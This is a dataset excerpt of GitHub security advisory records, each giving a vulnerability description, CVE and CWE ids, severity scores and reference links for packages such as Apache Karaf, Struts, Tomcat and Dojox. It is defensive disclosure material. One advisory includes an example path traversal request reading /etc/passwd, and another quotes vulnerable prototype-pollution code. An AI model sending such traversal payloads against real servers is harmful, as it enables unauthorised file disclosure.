Moderate severity vulnerability that affects org.apache.karaf:apache-karaf and org.apache.karaf:karaf
Apache Karaf kar deployer reads .kar archives and extracts the paths from the "repository/" and "resources/" entries in the zip file. It then writes out the content of these paths to the Karaf repo and resources directories. However, it doesn't do any validation on the paths in the zip file. This means that a malicious user could craft a .kar file with ".." directory names and break out of the directories to write arbitrary content to the filesystem. This is the "Zip-slip" vulnerability - https://snyk.io/research/zip-slip-vulnerability. This vulnerability is low if the Karaf process user has limited permission on the filesystem. Any Apache Karaf releases prior 4.2.3 is impacted.
{'CVE-2019-0191'}
2021-09-03T22:59:30Z
2019-03-25T16:16:44Z
MODERATE
6.5
{'CWE-22'}
{'https://github.com/advisories/GHSA-869j-5855-hjpm', 'https://nvd.nist.gov/vuln/detail/CVE-2019-0191', 'https://lists.apache.org/thread.html/6856aa7ed7dd805eaf65d0e5e95027dda3b2307aacd1ab4a838c5cd1@%3Cuser.karaf.apache.org%3E', 'https://lists.apache.org/thread.html/cef9a2d4b547625e5214684283ac5c59c9d9740e092e777dc3f85070@%3Ccommits.karaf.apache.org%3E', 'http://www.securityfocus.com/bid/107462'}
null
GHSA
GHSA-xcrm-qpp8-hcw4
Moderate severity vulnerability that affects org.apache.struts:struts2-rest-plugin
In Apache Struts 2.5 to 2.5.14, the REST Plugin is using an outdated JSON-lib library which is vulnerable and allow perform a DoS attack using malicious request with specially crafted JSON payload.
{'CVE-2017-15707'}
2021-09-21T22:29:47Z
2018-10-16T19:35:55Z
MODERATE
6.2
{'CWE-20'}
{'http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html', 'https://cwiki.apache.org/confluence/display/WW/S2-054', 'https://security.netapp.com/advisory/ntap-20171214-0001/', 'http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html', 'https://nvd.nist.gov/vuln/detail/CVE-2017-15707', 'http://www.securitytracker.com/id/1039946', 'https://github.com/advisories/GHSA-xcrm-qpp8-hcw4', 'http://www.securityfocus.com/bid/102021'}
null
GHSA
GHSA-9295-mhf3-v33m
Insecure temporary file in Netflix OSS Hollow
> ID: NFLX-2021-001 > Title: Local information disclosure in Hollow > Release Date: 2021-03-23 > Credit: Security Researcher @JLLeitschuh # Overview Security researcher @JLLeitschuh reported that Netflix Hollow (a Netflix OSS project available here: https://github.com/Netflix/hollow) writes to a local temporary directory before validating the permissions on it. # Impact An attacker with the ability to create directories and set permissions on the local filesystem could pre-create this directory and read or modify anything written there by the Hollow process. # Description Since the `Files.exists(parent)` is run before creating the directories, an attacker can pre-create these directories with wide permissions. Additionally, since an insecure source of randomness is used, the file names to be created can be deterministically calculated. # Workarounds and Fixes Avoid running Hollow in configurations that share a filesystem with less-trusted processes. May be fixed in a future release.
{'CVE-2021-28099'}
2021-03-30T16:13:42Z
2021-03-29T18:25:26Z
MODERATE
0
{'CWE-377'}
{'https://github.com/advisories/GHSA-9295-mhf3-v33m', 'https://nvd.nist.gov/vuln/detail/CVE-2021-28099', 'https://github.com/Netflix/security-bulletins/blob/master/advisories/nflx-2021-001.md', 'https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-j83w-7qr9-wv86', 'https://github.com/Netflix/hollow/issues/502'}
null
GHSA
GHSA-w7j2-35mf-95p7
Incorrect check on buffer length in rand_core
An issue was discovered in the rand_core crate before 0.6.2 for Rust. Because `read_u32_into` and `read_u64_into` mishandle certain buffer-length checks, a random number generator may be seeded with too little data. The vulnerability was introduced in v0.6.0. The advisory doesn't apply to earlier minor version numbers.
{'CVE-2021-27378'}
2022-04-29T17:25:04Z
2021-08-25T20:52:16Z
CRITICAL
9.8
{'CWE-330'}
{'https://rustsec.org/advisories/RUSTSEC-2021-0023.html', 'https://github.com/advisories/GHSA-w7j2-35mf-95p7', 'https://github.com/rust-random/rand/compare/0.6.0...rand_core-0.6.2#diff-f41b3dfa5ce28f3bee390d327c50621e141cf3569921f8e9ca15ccfcf25263a9R28', 'https://nvd.nist.gov/vuln/detail/CVE-2021-27378', 'https://github.com/rust-random/rand/compare/0.6.0...rand_core-0.6.2#diff-f41b3dfa5ce28f3bee390d327c50621e141cf3569921f8e9ca15ccfcf25263a9R19', 'https://github.com/rust-random/rand/pull/1096'}
null
GHSA
GHSA-3hw5-q855-g6cw
Prototype Pollution in Dojox
The Dojox jQuery wrapper `jqMix` mixin method is vulnerable to Prototype Pollution. Affected Area: ``` //https://github.com/dojo/dojox/blob/master/jq.js#L442 var tobj = {}; for(var x in props){ // the "tobj" condition avoid copying properties in "props" // inherited from Object.prototype. For example, if obj has a custom // toString() method, don't overwrite it with the toString() method // that props inherited from Object.prototype if((tobj[x] === undefined || tobj[x] != props[x]) && props[x] !== undefined && obj != props[x]){ if(dojo.isObject(obj[x]) && dojo.isObject(props[x])){ if(dojo.isArray(props[x])){ obj[x] = props[x]; }else{ obj[x] = jqMix(obj[x], props[x]); } }else{ obj[x] = props[x]; } ```
{'CVE-2020-5259'}
2021-02-18T19:45:36Z
2020-03-10T18:03:32Z
LOW
7.7
{'CWE-94'}
{'https://github.com/advisories/GHSA-3hw5-q855-g6cw', 'https://nvd.nist.gov/vuln/detail/CVE-2020-5259', 'https://lists.debian.org/debian-lts-announce/2020/03/msg00012.html', 'https://github.com/dojo/dojox/security/advisories/GHSA-3hw5-q855-g6cw', 'https://github.com/dojo/dojox/commit/47d1b302b5b23d94e875b77b9b9a8c4f5622c9da'}
null
GHSA
GHSA-jmf4-pq78-f8vj
Moderate severity vulnerability that affects org.apache.hive:hive-jdbc
In Apache Hive 2.3.3, 3.1.0 and earlier, Hive "EXPLAIN" operation does not check for necessary authorization of involved entities in a query. An unauthorized user can do "EXPLAIN" on arbitrary table or view and expose table metadata and statistics.
{'CVE-2018-1314'}
2021-09-14T19:47:16Z
2018-11-21T22:24:50Z
MODERATE
4.3
{'CWE-862'}
{'https://nvd.nist.gov/vuln/detail/CVE-2018-1314', 'http://www.securityfocus.com/bid/105884', 'https://github.com/advisories/GHSA-jmf4-pq78-f8vj', 'https://lists.apache.org/thread.html/3da47dbcbf09697387f29d2f1aed970523b6b334d93afd3cced23727@%3Cdev.hive.apache.org%3E'}
null
GHSA
GHSA-4822-jvwx-w47h
Uncontrolled Resource Consumption in Matrix Synapse
### Impact Synapse before 1.52.0 with URL preview functionality enabled will attempt to generate URL previews for media stream URLs without properly limiting connection time. Connections will only be terminated after `max_spider_size` (default: 10M) bytes have been downloaded, which can in some cases lead to long-lived connections towards the streaming media server (for instance, Icecast). This can cause excessive traffic and connections toward such servers if their stream URL is, for example, posted to a large room with many Synapse instances with URL preview enabled. ### Patches 1.52.0 implements a timeout mechanism which will terminate URL preview connections after 30 seconds. Since generating URL previews for media streams is not supported and always fails, 1.53.0 additionally implements an allow list for content types for which Synapse will even attempt to generate a URL preview. We recommend upgrading to 1.53.0 to fully resolve the issue. ### Workarounds Turn off URL preview functionality by setting `url_preview_enabled: false` in the Synapse configuration file. ### References - Patch (timeout): https://github.com/matrix-org/synapse/pull/11784 - Patch (content type allow list): https://github.com/matrix-org/synapse/pull/11936 ### For more information If you have any questions or comments about this advisory, e-mail us at security@matrix.org.
null
2022-04-05T22:01:46Z
2022-04-01T18:16:42Z
MODERATE
0
{'CWE-400'}
{'https://github.com/matrix-org/synapse/security/advisories/GHSA-4822-jvwx-w47h', 'https://github.com/matrix-org/synapse/releases/tag/v1.53.0', 'https://github.com/matrix-org/synapse/pull/11936', 'https://github.com/matrix-org/synapse/releases/tag/v1.52.0', 'https://github.com/matrix-org/synapse/pull/11784', 'https://github.com/advisories/GHSA-4822-jvwx-w47h'}
null
GHSA
GHSA-p2hm-8725-c8x8
Downloads Resources over HTTP in cue-sdk-node
Affected versions of `cue-sdk-node` insecurely download an executable over an unencrypted HTTP connection. In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `cue-sdk-node`. ## Recommendation No patch is currently available for this vulnerability. The best mitigation is currently to avoid using this package, using a different package if available. Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.
{'CVE-2016-10590'}
2021-01-08T18:24:36Z
2019-02-18T23:50:58Z
HIGH
0
{'CWE-311'}
{'https://nvd.nist.gov/vuln/detail/CVE-2016-10590', 'https://www.npmjs.com/advisories/190', 'https://github.com/advisories/GHSA-p2hm-8725-c8x8', 'https://nodesecurity.io/advisories/190'}
null
GHSA
GHSA-mv2r-q4g5-j8q5
Microsoft.Data.OData Library improperly handles web requests
A denial of service vulnerability exists when OData Library improperly handles web requests, aka "OData Denial of Service Vulnerability." This affects Microsoft.Data.OData.
{'CVE-2018-8269'}
2022-04-26T19:08:21Z
2018-10-16T19:58:31Z
HIGH
7.5
null
{'https://github.com/advisories/GHSA-mv2r-q4g5-j8q5', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8269', 'https://www.exploit-db.com/exploits/46101/', 'http://www.securityfocus.com/bid/105322', 'https://nvd.nist.gov/vuln/detail/CVE-2018-8269'}
null
GHSA
GHSA-hgr5-82rc-p936
Cross-Site Scripting in md-data-table
All versions of `md-data-table` are vulnerable to cross-site scripting (XSS). This vulnerability is exploitable if an attacker has control over data that is rendered by `mdt-row` ## Recommendation As there is no fix for this vulnerability at this time we recommend either selecting another package to perform this functionality or properly sanitizing all user data prior to rendering with `md-data-table`
null
2021-09-24T22:03:39Z
2020-09-01T21:24:41Z
HIGH
0
{'CWE-79'}
{'https://github.com/advisories/GHSA-hgr5-82rc-p936', 'https://www.npmjs.com/advisories/748'}
null
GHSA
GHSA-4hpf-3wq7-5rpr
Regular expression deinal of service (ReDoS) in is-my-json-valid
It was discovered that the is-my-json-valid JavaScript library used an inefficient regular expression to validate JSON fields defined to have email format. A specially crafted JSON file could cause it to consume an excessive amount of CPU time when validated.
{'CVE-2018-1107'}
2022-01-06T20:44:07Z
2022-01-06T20:44:07Z
MODERATE
5.3
{'CWE-400'}
{'https://snyk.io/vuln/npm:is-my-json-valid:20180214', 'https://bugzilla.redhat.com/show_bug.cgi?id=1546357', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1107', 'https://github.com/advisories/GHSA-4hpf-3wq7-5rpr', 'https://github.com/mafintosh/is-my-json-valid/pull/159', 'https://github.com/mafintosh/is-my-json-valid/commit/b3051b277f7caa08cd2edc6f74f50aeda65d2976'}
null
GHSA
GHSA-fr26-qjc8-mvjx
Possible route enumeration in production mode via RouteNotFoundError view in Vaadin 10, 11-14, and 15-19
Improper sanitization of path in default `RouteNotFoundError` view in `com.vaadin:flow-server` versions 1.0.0 through 1.0.14 (Vaadin 10.0.0 through 10.0.18), 1.1.0 prior to 2.0.0 (Vaadin 11 prior to 14), 2.0.0 through 2.6.1 (Vaadin 14.0.0 through 14.6.1), and 3.0.0 through 6.0.9 (Vaadin 15.0.0 through 19.0.8) allows network attacker to enumerate all available routes via crafted HTTP request when application is running in production mode and no custom handler for `NotFoundException` is provided.
null
2021-10-13T18:56:12Z
2021-10-13T18:56:12Z
MODERATE
5.3
null
{'https://vaadin.com/security/cve-2021-31412', 'https://github.com/advisories/GHSA-fr26-qjc8-mvjx', 'https://github.com/vaadin/flow/security/advisories/GHSA-fr26-qjc8-mvjx'}
null
GHSA
GHSA-g39q-f4rm-85x4
OS Command Injection in baserCMS
baserCMS versions prior to 4.4.5 allows a remote attacker with an administrative privilege to execute arbitrary OS commands via unspecified vectors.
{'CVE-2021-20682'}
2021-06-08T20:10:37Z
2021-06-08T20:10:37Z
HIGH
7.2
{'CWE-78'}
{'https://github.com/baserproject/basercms', 'https://nvd.nist.gov/vuln/detail/CVE-2021-20682', 'https://jvn.jp/en/jp/JVN64869876/index.html', 'https://github.com/advisories/GHSA-g39q-f4rm-85x4', 'https://basercms.net/security/JVN64869876', 'https://packagist.org/packages/baserproject/basercms'}
null
GHSA
GHSA-rp4x-wxqv-cf9m
Reflected cross-site scripting in default RouteNotFoundError view in Vaadin 10 and 11-13
Missing output sanitization in default `RouteNotFoundError` view in `com.vaadin:flow-server` versions 1.0.0 through 1.0.10 (Vaadin 10.0.0 through 10.0.13), and 1.1.0 through 1.4.2 (Vaadin 11.0.0 through 13.0.5) allows attacker to execute malicious JavaScript via crafted URL. - https://vaadin.com/security/cve-2019-25027
{'CVE-2019-25027'}
2021-05-06T17:13:01Z
2021-04-19T14:52:29Z
MODERATE
6.1
{'CWE-81', 'CWE-79'}
{'https://vaadin.com/security/cve-2019-25027', 'https://github.com/vaadin/flow/security/advisories/GHSA-rp4x-wxqv-cf9m', 'https://nvd.nist.gov/vuln/detail/CVE-2019-25027', 'https://github.com/advisories/GHSA-rp4x-wxqv-cf9m', 'https://github.com/vaadin/flow/pull/5498'}
null
GHSA
GHSA-x8wj-6m73-gfqp
Relative Path Traversal (CWE-23) in chunked uploads in oneup/uploader-bundle
### Impact The vulnerability was identified in the web service for a chunked file upload. While the names of the POST parameters vary with the used frontend, their values are always used in the same way to build a path where the chunks are stored and assembled temporarily. By not validating these parameters properly, OneupUploaderBundle is susceptible to a path traversal vulnerability which can be exploited to upload files to arbitrary folders on the filesystem. The assembly process can further be misused with some restrictions to delete and copy files to other locations. The vulnerability can be exploited by any users that have legitimate access to the upload functionality and can lead to arbitrary code execution, denial of service and disclosure of confidential information. ### Patches Yes, see version 1.9.3 and 2.1.5. ### References https://owasp.org/www-community/attacks/Path_Traversal ### Credits: This security vulnerability was found by Thibaud Kehler of SySS GmbH. E-Mail: thibaud.kehler@syss.de
{'CVE-2020-5237'}
2022-01-04T19:45:22Z
2020-02-18T18:59:24Z
HIGH
8.8
{'CWE-23', 'CWE-22'}
{'https://github.com/advisories/GHSA-x8wj-6m73-gfqp', 'https://nvd.nist.gov/vuln/detail/CVE-2020-5237', 'https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-003.txt', 'https://github.com/1up-lab/OneupUploaderBundle/security/advisories/GHSA-x8wj-6m73-gfqp', 'https://github.com/1up-lab/OneupUploaderBundle/commit/a6011449b716f163fe1ae323053077e59212350c'}
null
GHSA
GHSA-r8hx-3qx6-hxq9
Malicious Package in commandre
All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets. ## Recommendation Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
null
2021-10-01T20:59:18Z
2020-09-03T19:41:14Z
CRITICAL
9.1
{'CWE-506'}
{'https://www.npmjs.com/advisories/1387', 'https://github.com/advisories/GHSA-r8hx-3qx6-hxq9'}
null
GHSA
GHSA-jcxc-rh6w-wf49
Link Following in Iris
This affects all versions of package github.com/kataras/iris; all versions of package github.com/kataras/iris/v12. The unsafe handling of file names during upload using UploadFormFiles method may enable attackers to write to arbitrary locations outside the designated target folder.
{'CVE-2021-23772'}
2022-04-01T21:02:48Z
2022-01-06T21:36:19Z
HIGH
7.5
{'CWE-59'}
{'https://github.com/advisories/GHSA-jcxc-rh6w-wf49', 'https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMKATARASIRIS-2325169', 'https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMKATARASIRISV12-2325170', 'https://github.com/kataras/iris/commit/e213dba0d32ff66653e0ef124bc5088817264b08', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23772'}
null
GHSA
GHSA-qmv4-jgp7-mf68
Broken CORS in sails
Affected versions of `sails` have an issue with the CORS configuration where the value of the origin header is reflected as the value for the `Access-Control-Allow-Origin` header. This may allow an attacker to make AJAX requests to vulnerable hosts through cross-site scripting or a malicious HTML Document, effectively bypassing the Same Origin Policy. ## Mitigating Factors This is only an issue when `allRoutes` is set to `true` and `origin` is set to `*` or left commented out in the sails CORS config file. The problem can be compounded when the cors `credentials` setting is not provided, because at that point authenticated cross domain requests are possible. ## Recommendation Update to version 0.12.7 or later. As this vulnerability is primarily a user error, the patch for the vulnerability will simply cause the application to write an error message to the console when a vulnerable configuration is used in a production environment. Writing a proper CORS configuration is still the responsibility of the user, so it is necessary to check for the error message after installing the patch. Be sure you are not using `allRoutes: true` with `origin:'*'`, and that you uncomment `origin` and set it to a reasonable value. Ensure that if `origin` is set to `*` that you truly mean for all other websites to be able to make cross-domain requests to your API. Likewise, ensure `credentials` is uncommented out and set to the appropriate value. Make sure to explicitly set which origins may request resources via CORS.
{'CVE-2016-10549'}
2021-01-08T01:58:25Z
2019-02-18T23:40:10Z
HIGH
0
{'CWE-284'}
{'https://github.com/advisories/GHSA-qmv4-jgp7-mf68', 'https://www.npmjs.com/advisories/148', 'http://sailsjs.org/documentation/concepts/security/cors', 'http://sailsjs.org/documentation/reference/configuration/sails-config-cors', 'https://nodesecurity.io/advisories/148', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10549'}
null
GHSA
GHSA-45xm-v8gq-7jqx
Excessive memory allocation
In version from 3.0.0 to 3.5.3 of Eclipse Vert.x, the WebSocket HTTP upgrade implementation buffers the full http request before doing the handshake, holding the entire request body in memory. There should be a reasonnable limit (8192 bytes) above which the WebSocket gets an HTTP response with the 413 status code and the connection gets closed.
{'CVE-2018-12541'}
2022-04-25T20:23:46Z
2018-10-17T16:19:59Z
MODERATE
6.5
{'CWE-119', 'CWE-789'}
{'https://lists.apache.org/thread.html/r8db0431ecf93f2dd2128db5ddca897b33ba883b7f126648d6a9e4c47@%3Ccommits.pulsar.apache.org%3E', 'https://github.com/advisories/GHSA-45xm-v8gq-7jqx', 'https://nvd.nist.gov/vuln/detail/CVE-2018-12541', 'https://lists.apache.org/thread.html/re5ddabee26fbcadc7254d03a5a073d64080a9389adc9e452529664ed@%3Ccommits.pulsar.apache.org%3E', 'https://lists.apache.org/thread.html/reb3cc4f3e10264896a541813c0030ec9d9466ba9b722fe5d4adc91cd@%3Cissues.bookkeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r11789cd6d67ecca2d6f6bbb11e34495e68ee99287b6c59edf5b1a09c@%3Ccommits.pulsar.apache.org%3E', 'https://github.com/eclipse-vertx/vert.x/issues/2648', 'https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26@%3Ccommits.pulsar.apache.org%3E', 'https://lists.apache.org/thread.html/r01123837ffbfdf5809e0a4ac354ad546e4ca8f18df89ee5a10eeb81b@%3Cissues.bookkeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r362835e6c7f34324ed24e318b363fcdd20cea91d0cea0b2e1164f73e@%3Cissues.bookkeeper.apache.org%3E', 'https://bugs.eclipse.org/bugs/show_bug.cgi?id=539170', 'https://lists.apache.org/thread.html/r344235b1aea2f7fa2381495df1d77d02b595e3d7e4626e701f7c1062@%3Ccommits.pulsar.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2018:2946', 'https://lists.apache.org/thread.html/r3da899890536af744dec897fbc561fd9810ac45e79a16164b53c31b2@%3Ccommits.pulsar.apache.org%3E', 'https://lists.apache.org/thread.html/r1af71105539fe01fcecb92d2ecd8eea56c515fb1c80ecab4df424553@%3Cissues.bookkeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r79789a0afb184abd13a2c07016e6e7ab8e64331f332b630bf82a2eed@%3Ccommits.pulsar.apache.org%3E', 'https://lists.apache.org/thread.html/r98dc06e2b1c498d0e9eb5038d8e1aefd24e411e50522e7082dd9e0b7@%3Ccommits.bookkeeper.apache.org%3E', 'https://lists.apache.org/thread.html/rbdc279ecdb7ac496a03befb05a53605c4ce2b67e14f8f4df4cfa1203@%3Cissues.bookkeeper.apache.org%3E'}
null
GHSA
GHSA-hv5f-73mr-7vvj
Cross-site Scripting in Mattermost
Mattermost 5.38 and earlier fails to sufficiently sanitize clipboard contents, which allows a user-assisted attacker to inject arbitrary web script in product deployments that explicitly disable the default CSP.
{'CVE-2021-37860'}
2021-10-06T13:08:14Z
2021-09-23T23:11:06Z
MODERATE
6.1
{'CWE-79'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-37860', 'https://github.com/advisories/GHSA-hv5f-73mr-7vvj', 'https://mattermost.com/security-updates/', 'https://docs.mattermost.com/install/self-managed-changelog.html#release-v5-39-quality-release'}
null
GHSA
GHSA-pq5x-rprq-8jrj
Directory Traversal in exxxxxxxxxxx
Affected versions of `exxxxxxxxxxx` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system. This vulnerability is only effective for files that have a file extension, which provides a partial mitigation. Example request: ``` GET /../../../../../../../../../../etc/passwd HTTP/1.1 host:foo ``` ## Recommendation No patch is available for this vulnerability. It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.
{'CVE-2017-16130'}
2021-01-08T18:19:46Z
2018-07-23T22:06:14Z
HIGH
0
{'CWE-22'}
{'https://nvd.nist.gov/vuln/detail/CVE-2017-16130', 'https://github.com/advisories/GHSA-pq5x-rprq-8jrj', 'https://www.npmjs.com/advisories/478', 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/exxxxxxxxxxx', 'https://nodesecurity.io/advisories/478'}
null
GHSA
GHSA-jvpp-hxjj-5ccc
Improper Input Validation and Missing Authentication for Critical Function in Apache ActiveMQ
It was found that the Apache ActiveMQ client before 5.15.5 exposed a remote shutdown command in the ActiveMQConnection class. An attacker logged into a compromised broker could use this flaw to achieve denial of service on a connected client.
{'CVE-2015-7559'}
2021-08-17T20:27:35Z
2019-08-01T19:17:45Z
MODERATE
4.9
{'CWE-306', 'CWE-20'}
{'https://nvd.nist.gov/vuln/detail/CVE-2015-7559', 'https://github.com/advisories/GHSA-jvpp-hxjj-5ccc', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2015-7559', 'https://issues.apache.org/jira/browse/AMQ-6470'}
null
GHSA
GHSA-7j44-fv4x-79g9
Improper Input Validation in once_cell
An issue was discovered in the once_cell crate before 1.0.1 for Rust. There is a panic during initialization of Lazy.
{'CVE-2019-16141'}
2021-08-25T20:44:18Z
2021-08-25T20:44:18Z
MODERATE
7.5
{'CWE-20'}
{'https://github.com/matklad/once_cell/issues/46', 'https://nvd.nist.gov/vuln/detail/CVE-2019-16141', 'https://github.com/advisories/GHSA-7j44-fv4x-79g9', 'https://rustsec.org/advisories/RUSTSEC-2019-0017.html'}
null
GHSA
GHSA-xh99-hw7h-wf63
Unchecked validity of Facing values in PlayerActionPacket
### Impact A remote attacker may crash a server by sending `PlayerActionPacket` with invalid facing values (e.g. negative), specifically with `START_BREAK` or `CRACK_BLOCK` actions, or with a `UseItemTransactionData` (typically in `InventoryTransactionPacket`). ### Patches f126479c37ff00a717a828f5271cf8e821d12d6c ### Workarounds Using a plugin, cancel `DataPacketReceiveEvent` if the packet is `PlayerActionPacket` and the facing is outside the range 0-5 when receiving START_BREAK or CRACK_BLOCK actions, or UseItemTransactionData. However, beware that negative values may be legitimate in some cases. ### For more information If you have any questions or comments about this advisory: * Email us at [team@pmmp.io](mailto:team@pmmp.io)
null
2022-01-13T22:25:44Z
2022-01-13T22:25:44Z
HIGH
7.5
null
{'https://github.com/pmmp/PocketMine-MP/commit/f126479c37ff00a717a828f5271cf8e821d12d6c', 'https://github.com/advisories/GHSA-xh99-hw7h-wf63', 'https://github.com/pmmp/PocketMine-MP/security/advisories/GHSA-xh99-hw7h-wf63'}
null
GHSA
GHSA-c9hw-wf7x-jp9j
Improper Privilege Management in Tomcat
When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed: returning arbitrary files from anywhere in the web application, processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.
{'CVE-2020-1938'}
2022-05-02T16:27:26Z
2020-06-15T18:51:21Z
CRITICAL
9.8
{'CWE-269'}
{'https://lists.apache.org/thread.html/r57f5e4ced436ace518a9e222fabe27fb785f09f5bf974814cc48ca97@%3Ccommits.tomee.apache.org%3E', 'https://www.debian.org/security/2020/dsa-4680', 'https://www.oracle.com/security-alerts/cpujan2021.html', 'https://lists.apache.org/thread.html/r43faacf64570b1d9a4bada407a5af3b2738b0c007b905f1b6b608c65@%3Cusers.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/r772335e6851ad33ddb076218fa4ff70de1bf398d5b43e2ddf0130e5d@%3Cdev.tomcat.apache.org%3E', 'https://lists.debian.org/debian-lts-announce/2020/05/msg00026.html', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2XFLQB3O5QVP4ZBIPVIXBEZV7F2R7ZMS/', 'https://lists.apache.org/thread.html/ra7092f7492569b39b04ec0decf52628ba86c51f15efb38f5853e2760@%3Cnotifications.ofbiz.apache.org%3E', 'https://lists.apache.org/thread.html/r5e2f1201b92ee05a0527cfc076a81ea0c270be299b87895c0ddbe02b@%3Cusers.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/r17aaa3a05b5b7fe9075613dd0c681efa60a4f8c8fbad152c61371b6e@%3Cusers.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/r6a5633cad1b560a1e51f5b425f02918bdf30e090fdf18c5f7c2617eb@%3Ccommits.tomee.apache.org%3E', 'http://support.blackberry.com/kb/articleDetail?articleNumber=000062739', 'https://lists.apache.org/thread.html/r1125f3044a0946d1e7e6f125a6170b58d413ebd4a95157e4608041c7@%3Cannounce.apache.org%3E', 'https://www.oracle.com/security-alerts/cpujul2020.html', 'https://lists.apache.org/thread.html/rd50baccd1bbb96c2327d5a8caa25a49692b3d68d96915bd1cfbb9f8b@%3Cusers.tomcat.apache.org%3E', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/L46WJIV6UV3FWA5O5YEY6XLA73RYD53B/', 'https://lists.apache.org/thread.html/r8f7484589454638af527182ae55ef5b628ba00c05c5b11887c922fb1@%3Cnotifications.ofbiz.apache.org%3E', 'https://lists.apache.org/thread.html/rcd5cd301e9e7e39f939baf2f5d58704750be07a5e2d3393e40ca7194@%3Ccommits.tomee.apache.org%3E', 'https://lists.apache.org/thread.html/r4afa11e0464408e68f0e9560e90b185749363a66398b1491254f7864@%3Cusers.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/r7c6f492fbd39af34a68681dbbba0468490ff1a97a1bd79c6a53610ef%40%3Cannounce.tomcat.apache.org%3E', 'https://www.debian.org/security/2020/dsa-4673', 'https://lists.apache.org/thread.html/r75113652e46c4dee687236510649acfb70d2c63e074152049c3f399d@%3Cnotifications.ofbiz.apache.org%3E', 'https://lists.apache.org/thread.html/rb1c0fb105ce2b93b7ec6fc1b77dd208022621a91c12d1f580813cfed@%3Cdev.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/r92d78655c068d0bc991d1edbdfb24f9c5134603e647cade1113d4e0a@%3Cusers.tomee.apache.org%3E', 'https://lists.apache.org/thread.html/r549b43509e387a42656f0641fa311bf27c127c244fe02007d5b8d6f6@%3Cdev.tomcat.apache.org%3E', 'http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00025.html', 'https://lists.debian.org/debian-lts-announce/2020/03/msg00006.html', 'https://lists.apache.org/thread.html/r74328b178f9f37fe759dffbc9c1f2793e66d79d7a8a20d3836551794@%3Cnotifications.ofbiz.apache.org%3E', 'https://lists.apache.org/thread.html/r9f119d9ce9239114022e13dbfe385b3de7c972f24f05d6dbd35c1a2f@%3Cusers.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/rf992c5adf376294af31378a70aa8a158388a41d7039668821be28df3@%3Ccommits.tomee.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2020-1938', 'https://lists.apache.org/thread.html/r856cdd87eda7af40b50278d6de80ee4b42d63adeb433a34a7bdaf9db@%3Cnotifications.ofbiz.apache.org%3E', 'https://lists.apache.org/thread.html/r38a5b7943b9a62ecb853acc22ef08ff586a7b3c66e08f949f0396ab1@%3Cusers.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/r4f86cb260196e5cfcbbe782822c225ddcc70f54560f14a8f11c6926f@%3Cusers.tomcat.apache.org%3E', 'https://security.gentoo.org/glsa/202003-43', 'https://lists.apache.org/thread.html/rd0774c95699d5aeb5e16e9a600fb2ea296e81175e30a62094e27e3e7@%3Ccommits.ofbiz.apache.org%3E', 'https://lists.apache.org/thread.html/rf26663f42e7f1a1d1cac732469fb5e92c89908a48b61ec546dbb79ca@%3Cbugs.httpd.apache.org%3E', 'https://lists.apache.org/thread.html/rce2af55f6e144ffcdc025f997eddceb315dfbc0b230e3d750a7f7425@%3Cnotifications.ofbiz.apache.org%3E', 'https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E', 